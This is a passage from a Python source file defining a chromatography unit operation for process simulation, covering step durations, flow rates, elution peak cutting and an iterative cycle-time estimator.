self.load_cv: float = -1 # load duration in CV
"""Load phase duration in CV.
This is preferable way to define the duration of the load step
as it does not require any estimations about steady state.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (this one)
* :attr:`load_c_end_ss`
* :attr:`load_c_end_relative_ss`
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_ss: _typing.Optional[_np.ndarray] = None
"""Load phase switch based on target product breakthrough conc.
Load phase duration is estimated from simulating steady state
operation and determining when the breakthrough reaches
specified concentration.
Steady state simulation requires
:attr:`column_porosity_retentate`
:attr:`load_recycle_pdf`.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (preferred)
* :attr:`load_c_end_ss` (this one)
* :attr:`load_c_end_relative_ss`
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_relative_ss: float = -1
"""Load phase switch based on relative breakthrough conc.
Load phase duration is estimated from simulating steady state
operation and determining when the product (binding species)
in the breakthrough reaches specified relative concentration
(relative to load concentration in steady-state operation).
Steady state simulation requires
:attr:`column_porosity_retentate`
:attr:`load_recycle_pdf`.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (preferred)
* :attr:`load_c_end_ss`
* :attr:`load_c_end_relative_ss` (this one)
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_estimate_with_iterative_solver: bool = True
"""Finer optimization of cycle length estimation.
Default = `True`.
In case load step duration is estimated based of breakthrough
criteria (i.e. by :attr:`load_c_end_ss` or
:attr:`load_c_end_relative_ss`), the model needs to simulate
steady-state operation in order to determine fixed load time.
This parameters enables iterative solver that allows more
precise estimation but might slow down the simulation.
Notes
-----
Max number of iteration steps is defined by
:attr:`load_c_end_estimate_with_iter_solver_max_iter`.
"""
self.load_c_end_estimate_with_iter_solver_max_iter: int = 1000
"""Max steps for optimization of cycle length estimation.
Default = 1000.
See Also
--------
:attr:`load_c_end_estimate_with_iterative_solver`
"""
self.load_extend_first_cycle: bool = False
"""Extend first load phase to achieve a faster steady-state.
Only relevant in case wash or load is recycled.
The duration of extension is defined by:
* :attr:`load_extend_first_cycle_cv` or
* :attr:`load_extend_first_cycle_t` or
* is determined automatically.
"""
self.load_extend_first_cycle_cv: float = -1
"""Duration of first load phase extension in column volumes.
Only relevant if :attr:`load_extend_first_cycle` is `True`.
If the duration if defined by
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`
then the values are added together.
"""
self.load_extend_first_cycle_t: float = -1
"""Duration of first load phase extension (time).
Only relevant if :attr:`load_extend_first_cycle` is `True`.
If the duration if defined by
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`
then the values are added together.
"""
self.load_target_lin_velocity: float = -1
"""Target load linear velocity.
It is used to provide information about required column height.
It does not have any impact on the rest of the model.
Units need to match other units in the model.
"""
self.wash_cv: float = -1
"""Duration of wash step.
The values of :attr:`wash_t` and
:attr:`wash_cv` are added together.
"""
self.wash_t: float = -1
"""Duration of wash step.
The values of :attr:`wash_t` and
:attr:`wash_cv` are added together.
"""
self.wash_f: float = -1
"""Wash step flow rate.
Wash step flow rate should be defined by
exactly one of the following attributes:
* :attr:`wash_f` (this one)
* :attr:`wash_f_rel`
"""
self.wash_f_rel: float = 1
"""Wash step flow rate relative to load flow rate. Default = 1.
Wash step flow rate = :attr:`wash_f_rel`
* `load flow rate`
Wash step flow rate should be defined by
exactly one of the following attributes:
* :attr:`wash_f`
* :attr:`wash_f_rel` (this one)
"""
self.unaccounted_losses_rel: float = 0
"""Unaccounted losses as a share of bound material.
Elution peak is scaled down by 1 - `unaccounted_losses_rel`
before applying peak cut criteria.
"""
self.elution_cv: float = -1
"""Duration of elution step.
The values of :attr:`elution_t` and
:attr:`elution_cv` are added together.
"""
self.elution_t: float = -1
"""Duration of elution step.
The values of :attr:`elution_t` and
:attr:`elution_cv` are added together.
"""
self.elution_f: float = -1
"""Elution step flow rate.
Elution step flow rate should be defined by
exactly one of the following attributes:
* :attr:`elution_f` (this one)
* :attr:`elution_f_rel`
"""
self.elution_f_rel: float = 1
"""Elution step flow rate relative to load flow rate.
Default = 1.
Elution step flow rate = :attr:`elution_f_rel`
* `load flow rate`
Elution step flow rate should be defined by
exactly one of the following attributes:
* :attr:`elution_f`
* :attr:`elution_f_rel` (this one)
"""
self.elution_buffer_c: _np.ndarray = _np.array([])
"""Elution buffer composition.
Default = empty array (= all components are 0).
If defined it must have a value for each specie.
"""
self.elution_peak_position_cv: float = -1
"""Position (cv) of elution peak in the elution step.
This is for 1st moment or mean residence time (and not
necessarily peak max position).
The values of :attr:`elution_peak_position_t` and
:attr:`elution_peak_position_cv` are added together.
"""
self.elution_peak_position_t: float = -1
"""Position (time) of elution peak in the elution step.
This is for 1st moment or mean residence time (and not
necessarily peak max position).
The values of :attr:`elution_peak_position_t` and
:attr:`elution_peak_position_cv` are added together.
"""
self.elution_peak_cut_start_t: float = -1
"""Elution peak cut start (time).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_cv: float = -1
"""Elution peak cut start (cv).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_c_rel_to_peak_max: float = -1
"""Elution peak cut start (signal relative to peak max).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_peak_area_share: float = -1
"""Elution peak cut start (share of total peak area).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_end_t: float = -1
"""Elution peak cut end (time).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_cv: float = -1
"""Elution peak cut end (cv).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_c_rel_to_peak_max: float = -1
"""Elution peak cut end (signal relative to peak max).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_peak_area_share: float = -1
"""Elution peak cut end (share of total peak area).
Exactly one peak cut end criteria should be defined.
"""
self.regeneration_cv: float = -1
"""Duration of regeneration step.
The values of :attr:`regeneration_t` and
:attr:`regeneration_cv` are added together.
"""
self.regeneration_t: float = -1
"""Duration of regeneration step.
The values of :attr:`regeneration_t` and
:attr:`regeneration_cv` are added together.
"""
self.regeneration_f: float = -1
"""Regeneration step flow rate.
Regeneration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`regeneration_f` (this one)
* :attr:`regeneration_f_rel`
"""
self.regeneration_f_rel: float = 1
"""Regeneration step flow rate relative to load flow rate.
Default = 1.
Regeneration step flow rate = :attr:`regeneration_f_rel`
* `load flow rate`
Regeneration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`regeneration_f`
* :attr:`regeneration_f_rel` (this one)
"""
self.wash_desorption: bool = False
"""Enable wash desorption.
Make sure the class implements the desorption dynamics.
"""
self.load_recycle: bool = False
"""Recycle load breakthrough. Default = False."""
self.load_recycle_pdf: _typing.Optional[_core.PDF] = None
"""PDF of wash and/or unbound load traveling through the column.
The unbound (not captured) part and desorbed part are propagated
through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
"""
self.wash_recycle: bool = False
"""Recycle wash. Default = False.
Wash is recycled onto 3rd column while the 2nd is on load step.
After the wash recycle, the 3rd column is connected to 2nd
column to recycle load breakthrough material.
"""
self.wash_recycle_duration_cv: float = -1
"""Duration of wash recycle (cv).
Relevant if :attr:`wash_recycle` is `True`.
If both (`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t`) are defined, then the values
are added together. If none of those is defined, then the
entire wash step is recycled.
"""
self.wash_recycle_duration_t: float = -1
"""Duration of wash recycle (time).
Relevant if :attr:`wash_recycle` is `True`.
If both (`wash_recycle_duration_t` and
:attr:`wash_recycle_duration_cv`) are defined, then the values
are added together. If none of those is defined, then the
entire wash step is recycled.
"""
@_core.UnitOperation.log.setter
def log(self, logger: _core._logger.RtdLogger):
"""Propagates logger across other elements that support it."""
# Default logic.
self._logger = logger
self._logger.set_data_tree(self._log_entity_id, self._log_tree)
# Propagate logger across other elements with logging.
if self.load_recycle_pdf is not None:
self.load_recycle_pdf.set_logger_from_parent(self.uo_id, logger)
if self.load_recycle_pdf is not None:
self.elution_peak_shape.set_logger_from_parent(self.uo_id, logger)
if self.load_recycle_pdf is not None:
self.load_bt.set_logger_from_parent(self.uo_id, logger)
def _get_flow_value(self,
step_name: str, var_name: str,
flow: float, rel_flow: float) -> float:
"""Calc flow rate of chromatographic step.
If `flow` is specified, `flow` is used.
Otherwise `rel_flow` == flow rate relative to load flow rate is
used.
If none are positive, then the load flow rate is used
and a warning is logged.
Parameters
----------
step_name
Step name (e.g. "Wash") for log messages.
var_name
Step variable name (e.g. "wash_t") for log data.
flow
Flow rate.
rel_flow
Flow rate relative to load flow rate.
Returns
-------
float
Flow rate.
"""
if flow > 0:
self.log.i_data(self._log_tree, var_name, flow)
elif rel_flow > 0:
flow = rel_flow * self._load_f
self.log.i_data(self._log_tree, var_name, flow)
else:
self.log.w(f"{step_name} step flow rate is not defined,"
f" using load flow rate instead.")
flow = self._load_f
return flow
def _get_time_value(self,
step_name: str, var_name: str,
t: float, cv: float, flow: float) -> float:
"""Calc duration of chromatographic step.
If the step duration is specified in cv and in t, then the
value are added together.
Parameters
----------
step_name
Step name (e.g. "Wash") for log messages.
var_name
Step variable name (e.g. "wash_t") for log data.
t
Duration (time).
cv
Duration (cv).
flow
Flow rate (required if `cv` > 0).
Returns
-------
float
Total step duration (time).
"""
# Calc.
t_sum = max(t, 0)
if cv > 0:
assert flow > 0, f"{step_name}: Flow rate must be defined (> 0)" \
f" if the duration is specified in CVs."
assert self._cv > 0, f"CV must be determined (by `calc_cv`)" \
f" before calculating duration based on CVs."
t_sum += cv * self._cv / flow # sum
# Log.
if t <= 0 and cv <= 0:
self.log.w(step_name + " time is not defined")
else:
self.log.i_data(self._log_tree, var_name, t_sum)
return t_sum
def _assert_non_binding_species(self):
"""Make sure binding species list is valid."""
if len(self.non_binding_species) > 0:
assert max(self.non_binding_species) < self._n_species, \
"Index of non_binding_species too large (indexes start with 0)"
assert list(set(self.non_binding_species)) \
== list(self.non_binding_species), \
"List of non_binding_species should have ascending order"
assert len(self.non_binding_species) < self._n_species, \
"All species cannot be non-binding."
# Log.
self.log.i_data(self._log_tree,
'non_binding_species',
self.non_binding_species)
def _calc_load_f(self):
"""Determine load flow rate (when on)."""
assert self._is_flow_box_shaped(), "Inlet flow must be box shaped."
self._load_f = self._f.max()
self.log.d_data(self._log_tree, 'load_f', self._load_f)
def _calc_cv(self):
"""Determine column volume."""
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.ERROR,
cv=self.cv,
ft_mean_retentate=self.ft_mean_retentate,
)
if self.cv > 0:
self._cv = self.cv
else: # `self.ft_mean_retentate` > 0.
assert self.column_porosity_retentate > 0, \
f"porosity_retentate must be defined to calc CV from " \
f" `self.ft_mean_retentate`."
assert self._load_f > 0, f"Load flow rate must be defined to" \
f" calc CV from `self.ft_mean_retentate`."
self._cv = self.ft_mean_retentate * self._load_f \
/ self.column_porosity_retentate
# Log.
self.log.i_data(self._log_tree, 'cv', self._cv)
def _report_column_dimensions(self):
"""Report column dimensions based on load linear velocity."""
if self.load_target_lin_velocity > 0:
self._col_h = self._cv * self.load_target_lin_velocity \
/ self._load_f
self.log.i_data(self._log_tree, "column_h", self._col_h)
self.log.i_data(self._log_tree,
"column_d",
(self._cv / self._col_h / _np.pi) ** 0.5 * 2)
def _calc_equilibration_t(self):
"""Determine equilibration step duration."""
if self.equilibration_cv > 0:
# Flow rate.
eq_f = self._get_flow_value("Equilibration",
"equilibration_f",
self.equilibration_f,
self.equilibration_f_rel)
# Duration.
self._equilibration_t = self._get_time_value("Equilibration",
"equilibration_t",
self.equilibration_t,
self.equilibration_cv,
eq_f)
else:
# Duration.
self._equilibration_t = max(self.equilibration_t, 0)
# Log.
self.log.i_data(self._log_tree,
'equilibration_t',
self._equilibration_t)
def _calc_wash_t_and_f(self):
"""Determine wash step flow rate and duration."""
# Flow rate.
self._wash_f = self._get_flow_value("Wash",
"wash_f",
self.wash_f,
self.wash_f_rel)
# Duration.
self._wash_t = self._get_time_value("Wash",
"wash_t",
self.wash_t,
self.wash_cv,
self._wash_f)
def _calc_elution_t_and_f(self):
"""Determine elution step flow rate and duration."""
# Flow rate.
self._elution_f = self._get_flow_value("Elution",
"elution_f",
self.elution_f,
self.elution_f_rel)
# Duration.
self._elution_t = self._get_time_value("Elution",
"elution_t",
self.elution_t,
self.elution_cv,
self._elution_f)
def _calc_elution_peak_t(self):
"""Determine elution peak mean position (1st momentum)."""
self._elution_peak_t = self._get_time_value(
"elution peak position",
"elution_peak_position_t",
self.elution_peak_position_t,
self.elution_peak_position_cv,
self._elution_f
)
def _update_elution_peak_pdf(self):
"""Update elution peak PDF."""
assert self._elution_peak_t > 0
assert self._elution_f > 0
# Calc elution peak shape.
self.elution_peak_shape.update_pdf(
rt_mean=self._elution_peak_t,
v_void=self._elution_peak_t * self._elution_f,
f=self._elution_f
)
self._p_elution_peak = \
self.elution_peak_shape.get_p() * (1 - self.unaccounted_losses_rel)
self.log.d_data(self._log_tree,
"p_elution_peak",
self._p_elution_peak)
def _calc_elution_peak_cut_i_start_and_i_end(self):
"""Calc elution peak cut start and end in form of time steps.
Values are relative to the beginning of the elution step.
"""
elution_peak_pdf: _np.ndarray = self._p_elution_peak.copy()
# Peak cut start.
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.WARNING,
elution_peak_cut_start_peak_area_share=self
.elution_peak_cut_start_peak_area_share,
elution_peak_cut_start_c_rel_to_peak_max=self
.elution_peak_cut_start_c_rel_to_peak_max,
elution_peak_cut_start_cv=self.elution_peak_cut_start_cv,
elution_peak_cut_start_t=self.elution_peak_cut_start_t
)
# Calc `elution_peak_cut_start_i`.
if self.elution_peak_cut_start_peak_area_share >= 0:
elution_peak_cut_start_i = _utils.vectors.true_start(
_np.cumsum(elution_peak_pdf * self._dt)
>= self.elution_peak_cut_start_peak_area_share
)
elif self.elution_peak_cut_start_c_rel_to_peak_max >= 0:
elution_peak_cut_start_i = _utils.vectors.true_start(
elution_peak_pdf
>= self.elution_peak_cut_start_c_rel_to_peak_max
* elution_peak_pdf.max()
)
elif self.elution_peak_cut_start_cv >= 0:
elution_peak_cut_start_i = \
int(self.elution_peak_cut_start_cv
* self._cv / self._elution_f / self._dt)
elif self.elution_peak_cut_start_t >= 0:
elution_peak_cut_start_i = \
int(self.elution_peak_cut_start_t / self._dt)
else:
self.log.w(f"Elution peak cut start is not defined."
f" Now collecting from the beginning"
f" of the elution phase.")
elution_peak_cut_start_i = 0
# Log.
self.log.i_data(self._log_tree,
"elution_peak_cut_start_i",
elution_peak_cut_start_i)
self.log.i_data(self._log_tree,
"elution_peak_cut_start_t",
elution_peak_cut_start_i * self._dt)
# Peak cut end.
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.WARNING,
elution_peak_cut_end_peak_area_share=self
.elution_peak_cut_end_peak_area_share,
elution_peak_cut_end_c_rel_to_peak_max=self
.elution_peak_cut_end_c_rel_to_peak_max,
elution_peak_cut_end_cv=self.elution_peak_cut_end_cv,
elution_peak_cut_end_t=self.elution_peak_cut_end_t,
)
# Calc `elution_peak_cut_end_i`.
if self.elution_peak_cut_end_peak_area_share >= 0:
elution_peak_cut_end_i = _utils.vectors.true_start(
_np.cumsum(elution_peak_pdf * self._dt)
>= (1 - self.elution_peak_cut_end_peak_area_share)
)
elif self.elution_peak_cut_end_c_rel_to_peak_max >= 0:
elution_peak_cut_end_i = _utils.vectors.true_end(
elution_peak_pdf
>= self.elution_peak_cut_end_c_rel_to_peak_max
* elution_peak_pdf.max()
)
elif self.elution_peak_cut_end_cv >= 0:
elution_peak_cut_end_i = \
int(self.elution_peak_cut_end_cv
* self._cv / self._elution_f / self._dt)
elif self.elution_peak_cut_end_t >= 0:
elution_peak_cut_end_i = \
_utils.vectors.true_end(self._t < self.elution_peak_cut_end_t)
else:
self.log.w(f"Elution peak cut end is not defined."
f" Now collecting to the end of the elution phase.")
elution_peak_cut_end_i = elution_peak_pdf.size
self._elution_peak_cut_start_i = elution_peak_cut_start_i
self._elution_peak_cut_end_i = elution_peak_cut_end_i
# Log.
self.log.i_data(self._log_tree,
"elution_peak_cut_end_i",
elution_peak_cut_end_i)
self.log.i_data(self._log_tree,
"elution_peak_cut_end_t",
elution_peak_cut_end_i * self._dt)
if self._elution_peak_cut_end_i * self._dt < self._elution_peak_t:
self.log.w(f"Peak end is cut before its maximum.")
if self._elution_peak_cut_end_i * self._dt > self._elution_t:
self.log.w(f"Peak cut end exceeds elution step duration.")
def _calc_elution_peak_mask(self):
"""Calc where the elution peak gets collected."""
self._elution_peak_mask = \
_np.ones(int(round(self._elution_t / self._dt)), dtype=bool)
self._elution_peak_mask[self._elution_peak_cut_end_i:] = False
self._elution_peak_mask[:self._elution_peak_cut_start_i] = False
self.log.d_data(self._log_tree,
"elution_peak_interval",
self._elution_peak_mask)
def _update_load_btc(self):
"""Update load breakthrough profile."""
assert self._cv > 0, "CV must be defined by now."
self.load_bt.update_btc_parameters(cv=self._cv)
def _calc_regeneration_t(self):
"""Calc regeneration step duration."""
if self.regeneration_cv > 0:
eq_f = self._get_flow_value("Regeneration",
"regeneration_f",
self.regeneration_f,
self.regeneration_f_rel)
self._regeneration_t = self._get_time_value("Regeneration",
"regeneration_t",
self.regeneration_t,
self.regeneration_cv,
eq_f)
else:
self._regeneration_t = max(self.regeneration_t, 0)
# Log.
self.log.i_data(self._log_tree, 'regeneration_t', self._regeneration_t)
def _update_load_recycle_pdf(self, flow):
"""Update pdf that describes propagation of recycled material.
Recycled material si composed of unbound (load) and desorbed
(wash) material throughout the column.
`self.load_recycle_pdf` gets updated.
"""
assert self.load_recycle_pdf is not None, \
f"`load_recycle_pdf` must be defined by now."
assert self.column_porosity_retentate > 0, \
f"Retentate porosity must be defined by now."
assert self._cv > 0, "CV must be defined by now."
v_void = self._cv * self.column_porosity_retentate
self.load_recycle_pdf.update_pdf(v_void=v_void,
f=flow,
rt_mean=v_void / flow)
self._p_load_recycle_pdf = self.load_recycle_pdf.get_p()
def _calc_load_recycle_wash_i(self):
"""Calculate wash recycle duration in form of time steps."""
if self.wash_recycle_duration_t > 0 \
or self.wash_recycle_duration_cv > 0:
self._wash_recycle_i_duration = int(self._get_time_value(
"Wash recycle", "load_wash_recycle_t",
self.wash_recycle_duration_t,
self.wash_recycle_duration_cv,
self._wash_f
) / self._dt)
else:
# Same as wash duration.
assert self._wash_t > 0
self._wash_recycle_i_duration = int(round(self._wash_t / self._dt))
def _get_load_bt_cycle_switch_criteria(self,
load_c_ss: _np.ndarray
) -> _np.ndarray:
"""Get steady-state cycle switch (== end of load) criteria.
Parameters
----------
load_c_ss
Load concentration during steady state operation.
Returns
-------
ndarray
Threshold concentration for load breakthrough.
"""
assert self.load_c_end_ss is not None \
or self.load_c_end_relative_ss > 0, \
f"Load step duration should be defined!"
if self.load_c_end_ss is not None:
load_c_end_ss = self.load_c_end_ss
if self.load_c_end_relative_ss > 0:
self.log.w(f"Cycle time defined by `load_c_end_ss`"
f" and `load_c_end_relative_ss`."
f" Simulation is using `load_c_end_ss`.")
else: # self.load_c_end_relative_ss > 0
load_c_end_ss = self.load_c_end_relative_ss * load_c_ss
# Log.
self.log.i_data(self._log_tree,
'load_c_end_ss',
load_c_end_ss)
return load_c_end_ss
# noinspection DuplicatedCode
def _calc_cycle_t(self):
"""Calculates cycle time (== load time for a single column).
Optional delay of first cycle is not part of this calculation.
"""
assert self._cv > 0
assert self._load_f > 0
if self.load_cv > 0:
t_cycle = self.load_cv * self._cv / self._load_f
if self.load_c_end_ss is not None \
or self.load_c_end_relative_ss > 0:
self.log.w(f"Cycle time defined in more than one way."
f" Simulation is using `load_cv`.")
else:
# Get bt profile for constant inlet.
# Inlet conc.
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
load_c_ss = self._estimate_steady_state_mean_c(binding_species)
# Simulate first cycle at constant load concentration.
f_first_load = self._load_f * _np.ones(self._t.size)
c_first_load = load_c_ss * _np.ones([len(binding_species),
self._t.size])
bt_first_load: _np.ndarray = \
load_c_ss - self.load_bt.calc_c_bound(f_first_load,
c_first_load)
# Propagate breakthrough.
bt_first_load_out, bt_first_wash_out = \
self._sim_c_recycle_propagation(f_first_load,
bt_first_load,
None)
# Calc cycle duration.
load_c_end_ss = self._get_load_bt_cycle_switch_criteria(load_c_ss)
# noinspection PyTypeChecker
i_t_first_cycle = _utils.vectors.true_start(
bt_first_load_out.sum(0) >= load_c_end_ss.sum())
t_cycle = i_t_first_cycle * self._dt
# Wash desorption.
if self.wash_desorption and self.wash_recycle:
c_wash_desorbed = self._sim_c_wash_desorption(
f_first_load[:i_t_first_cycle],
c_first_load[:, :i_t_first_cycle]
- bt_first_load[:, :i_t_first_cycle])
else:
c_wash_desorbed = None
bt_first_load_out, bt_first_wash_out = \
self._sim_c_recycle_propagation(
f_first_load[:i_t_first_cycle],
bt_first_load[:, :i_t_first_cycle],
c_wash_desorbed)
if self.load_recycle:
if not self.load_c_end_estimate_with_iterative_solver:
self.log.w(f"Estimating cycle duration:"
f" Assuming sharp breakthrough profile.")
i_load_recycle_start = self._wash_recycle_i_duration \
if self.wash_recycle else 0
m_load_recycle = \
bt_first_load_out[
:,
i_load_recycle_start:i_t_first_cycle
].sum() * self._load_f * self._dt
_t_diff = m_load_recycle / self._load_f / load_c_ss.sum()
t_cycle -= _t_diff
self._load_recycle_m_ss = m_load_recycle
self.log.i_data(self._log_tree,
'm_load_recycle_ss',
m_load_recycle)
self.log.i_data(self._log_tree,
'shorten_cycle_t_due_to_bt_recycle',
_t_diff)
if self.wash_recycle:
if not self.load_c_end_estimate_with_iterative_solver:
self.log.w(f"Estimating cycle duration:"
f" Assuming sharp breakthrough profile.")
m_wash_recycle = bt_first_wash_out[
:,
:self._wash_recycle_i_duration
].sum() * self._wash_f * self._dt
_t_diff = m_wash_recycle / self._load_f / load_c_ss.sum()
t_cycle -= _t_diff
self._wash_recycle_m_ss = m_wash_recycle
self.log.i_data(self._log_tree,
'm_wash_recycle_ss',
m_wash_recycle)
self.log.i_data(self._log_tree,
'shorten_cycle_t_due_to_wash_recycle',
_t_diff)
if self.load_c_end_estimate_with_iterative_solver \
and (self.wash_recycle or self.load_recycle):
c_load_fist_cycle = load_c_ss * _np.ones([len(binding_species),
i_t_first_cycle * 2])
def sim_cycle(f_load: _np.ndarray,
c_load: _np.ndarray,
i_prev_cycle: int) -> _typing.Tuple[_np.ndarray,
_np.ndarray,
int]:
"""Simulates load-wash cycle. Calc load duration.
Load duration is determined based on breakthrough
criteria.
Parameters
----------
f_load
Load flow rate profile.
c_load
Load conc profile.
i_prev_cycle
Previous cycle duration in time steps.
Returns
-------
f_load_next_cycle
Load and wash breakthrough flow rate profile.
c_load_next_cycle
Load and wash breakthrough conc profile.
i_cycle
Current cycle duration in time steps.
"""
# Load.
bt_load: _np.ndarray = \
c_load - self.load_bt.calc_c_bound(f_load, c_load)
# Propagate breakthrough.
bt_load_out, _ = self._sim_c_recycle_propagation(
f_load,
bt_load,
None)
# 'Stop' load at specified breakthrough criteria.
# noinspection PyTypeChecker
i_cycle_duration = _utils.vectors.true_start(
bt_load_out.sum(0) >= load_c_end_ss.sum())
# Cut load at specified time.
bt_load = bt_load[:, :i_cycle_duration]
# Wash desorption.
if self.wash_desorption and self.wash_recycle:
c_first_wash_desorbed = self._sim_c_wash_desorption(
f_load[:i_cycle_duration],
c_load[:, :i_cycle_duration]
- bt_load[:, :i_cycle_duration])
else:
c_first_wash_desorbed = None
# Propagate load and wash leftovers.
bt_load_out, bt_wash_out = self._sim_c_recycle_propagation(
f_load[:i_cycle_duration],
bt_load,
c_first_wash_desorbed)
# Construct load for next cycle.
# Recycle load.
if self.load_recycle:
rec_load = bt_load_out[:,
i_prev_cycle:i_cycle_duration]
else:
rec_load = _np.zeros_like(
bt_load_out[:, i_prev_cycle:i_cycle_duration])
# Next load profiles.
c_next_load = _np.concatenate((rec_load,
c_load_fist_cycle),
axis=1)
f_next_load = self._load_f * _np.ones(c_next_load.shape[1])
wash_recycle_i_duration = self._wash_recycle_i_duration \
if self.wash_recycle else 0
# Log.
m_load_recycle_ss = \
bt_first_load_out[
:,
wash_recycle_i_duration:i_t_first_cycle
].sum() * self._load_f * self._dt
self._load_recycle_m_ss = m_load_recycle_ss
self.log.i_data(self._log_tree,
'm_load_recycle_ss',
m_load_recycle_ss)
# Recycle wash.
if self.wash_recycle:
c_next_load[:, :self._wash_recycle_i_duration] = \
bt_wash_out[:, :self._wash_recycle_i_duration]
f_next_load[:self._wash_recycle_i_duration] = \
self._wash_f
m_wash_recycle_ss = \
bt_wash_out[:,
:self._wash_recycle_i_duration
].sum() * self._wash_f * self._dt
self._wash_recycle_m_ss = m_wash_recycle_ss
self.log.i_data(self._log_tree,
'm_wash_recycle_ss',
m_wash_recycle_ss)
# Return next load and cycle duration.
return f_next_load, c_next_load, \
i_cycle_duration - i_prev_cycle
f_load_cycle = \
self._load_f * _np.ones(c_load_fist_cycle.shape[1])
c_load_cycle = c_load_fist_cycle
i_t_cycle_prev = i_t_first_cycle
i_t_cycle_estimate = 0
# Loop until cycle duration converges.
for i in range(
self.load_c_end_estimate_with_iter_solver_max_iter):
if abs(i_t_cycle_prev - i_t_cycle_estimate) <= 1:
self.log.i_data(self._log_tree,
"t_cycle_optimization_loop_iter",
i)
break
i_t_cycle_prev = i_t_cycle_estimate
f_load_cycle, c_load_cycle, i_t_cycle_estimate = \
sim_cycle(f_load_cycle, c_load_cycle, i_t_cycle_prev)
# print([i, i_t_cycle_prev, i_t_cycle_estimate])
if abs(i_t_cycle_prev - i_t_cycle_estimate) > 1:
self.log.w("Cycle duration estimator did not converge.")
t_cycle = i_t_cycle_estimate * self._dt
elif self.load_c_end_estimate_with_iterative_solver:
self.log.i(f"No need to use iterative solver in case of"
f" no recycling of load and/or wash.")
self._cycle_t = t_cycle
self.log.i_data(self._log_tree, 'cycle_t', t_cycle)
# noinspection DuplicatedCode
def _calc_first_cycle_extension_t(self):
"""Calc extension of first load.
First load step might be extended for processes with load and/or
wash recycle in order to get faster into steady-state regime.
"""
if not self.load_recycle and not self.wash_recycle:
self.log.w(f"Estimation of first cycle extension requested"
f" on a process without load recycle.")
self._first_cycle_extension_t = 0
return
elif not self.load_extend_first_cycle:
self.log.w(f"Estimation of first cycle extension requested"
f" on a process without extended first cycle.")
self._first_cycle_extension_t = 0
return
elif self.load_extend_first_cycle_t > 0:
self._first_cycle_extension_t = self.load_extend_first_cycle_t
return
elif self.load_extend_first_cycle_cv >= 0:
assert self._cv > 0, "CV should be defined by now."
assert self._load_f > 0, "Load flow rate should be defined by now."
self._first_cycle_extension_t = \
self.load_extend_first_cycle_cv * self._cv / self._load_f
elif self.load_cv > 0:
raise NotImplementedError(
f"Estimation of first cycle extension is only supported"
f" if the cycle length is defined by breakthrough cutoff"
f" criteria. This is due to the fact that if all the"
f" breakthrough material gets recycles,"
f" there is no single steady-state.")
else:
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
load_c_ss = self._estimate_steady_state_mean_c(binding_species)
# simulate first cycle at constant load concentration
f_first_load = self._load_f * _np.ones(self._t.size)
c_first_load = load_c_ss * _np.ones([len(binding_species),
self._t.size])
bt_first_load: _np.ndarray = \
load_c_ss - self.load_bt.calc_c_bound(f_first_load,
c_first_load)
# propagate breakthrough
bt_first_load_out, _ = \
self._sim_c_recycle_propagation(f_first_load,
bt_first_load,
None)
load_c_end_ss = self._get_load_bt_cycle_switch_criteria(load_c_ss)
# noinspection PyTypeChecker
i_t_first_cycle = _utils.vectors.true_start(
bt_first_load_out.sum(0) >= load_c_end_ss.sum())
dm = 0
if self.load_recycle:
assert hasattr(self, "_load_recycle_m_ss"), \
f"Function `_calc_cycle_t()` should already be called."
dm += self._load_recycle_m_ss
if self.wash_recycle:
assert hasattr(self, "_wash_recycle_m_ss"), \
f"Function `_calc_cycle_t()` should already be called."
dm += self._wash_recycle_m_ss
di = 0
if dm > 0:
m_ext_bt = _np.cumsum(
bt_first_load_out.sum(0)[i_t_first_cycle:]
) * self._load_f * self._dt
di += _utils.vectors.true_start(m_ext_bt >= dm)
self._first_cycle_extension_t = di * self._dt
def _calc_cycle_start_i_list(self):
"""Calculate load switch positions in form of time steps."""
assert self._cycle_t > 0, \
f"Cycle length must have been determined" \
f" (by `_calc_cycle_t()`) by now"
flow_i_start, flow_i_end = \
_utils.vectors.true_start_and_end(self._f > 0)
if self.load_extend_first_cycle:
assert self._first_cycle_extension_t >= 0, \
f"Prolong of first load cycle is set to `True`," \
f" but the length is undefined."
if self._first_cycle_extension_t == 0:
self.log.w(f"Prolong of first load cycle is set to `True`,"
f" but the length of the extension is 0.")
load_extend_first_cycle_t = self._first_cycle_extension_t
self.log.i_data(self._log_tree,
"load_extend_first_cycle_t",
load_extend_first_cycle_t)
else:
load_extend_first_cycle_t = 0
cycle_start_t_list = _np.arange(
self._t[flow_i_start] + load_extend_first_cycle_t,
self._t[flow_i_end - 1],
self._cycle_t
)
cycle_start_t_list[0] = self._t[flow_i_start]
self._cycle_start_i_list = _np.rint(
cycle_start_t_list / self._dt).astype(_np.int32)
self.log.i_data(self._log_tree,
